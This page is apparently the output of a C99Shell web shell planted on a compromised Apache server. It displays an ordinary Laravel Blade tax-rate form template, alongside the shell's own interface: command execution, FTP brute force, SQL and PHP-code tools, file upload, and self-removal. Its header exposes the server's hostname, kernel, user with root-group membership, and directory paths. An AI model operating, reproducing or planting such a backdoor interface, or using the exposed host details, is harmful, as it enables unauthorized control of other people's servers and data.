!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Tax/Resources/views/layout/   drwxr-xr-x
Free 27.08 GB of 117.98 GB (22.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     add-data.blade.php (1.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<table class="d-none table-hovered">
    <tr class="add-new-data">
        <td>
            <input type="hidden" name="id">
            <input type="hidden" name="tax_class_id">
            <input type="text" class="form-control" name="name">
        </td>
        <td>
            <input type="text" class="form-control geolocale-country" list="country-list" maxlength="30" name="country">
        </td>
        <td>
            <input type="text" class="form-control geolocale-state" list="state-list" maxlength="30" name="state">
        </td>
        <td>
            <input type="text" class="form-control" maxlength="30" name="city">
        </td>
        <td>
            <input type="text" class="form-control" maxlength="10" name="postcode">
        </td>
        <td>
            <input type="text" class="form-control positive-float-number" maxlength="16" name="tax_rate">
        </td>
        <td>
            <input type="number" class="form-control positive-int-number" maxlength="11" name="priority">
        </td>

        <th>
            <div>
                <div class="switch switch-bg m-r-10">
                    <input type="checkbox" name="compound" class="checkActivity" id="compound" value="0">
                    <label for="compound" class="cr"></label>
                </div>
            </div>
        </th>
        <th>
            <div>
                <div class="switch switch-bg m-r-10">
                    <input type="checkbox" name="shipping" class="checkActivity" id="shipping" value="0">
                    <label for="shipping" class="cr"></label>
                </div>
            </div>
        </th>
        <td>
            <span class="text-dark cursor_pointer delete-button action-btn d-flex justify-content-center" title="{{ __('Delete Tax Rate') }}">
                <i class="fa fa-trash"></i>
            </span>
        </td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--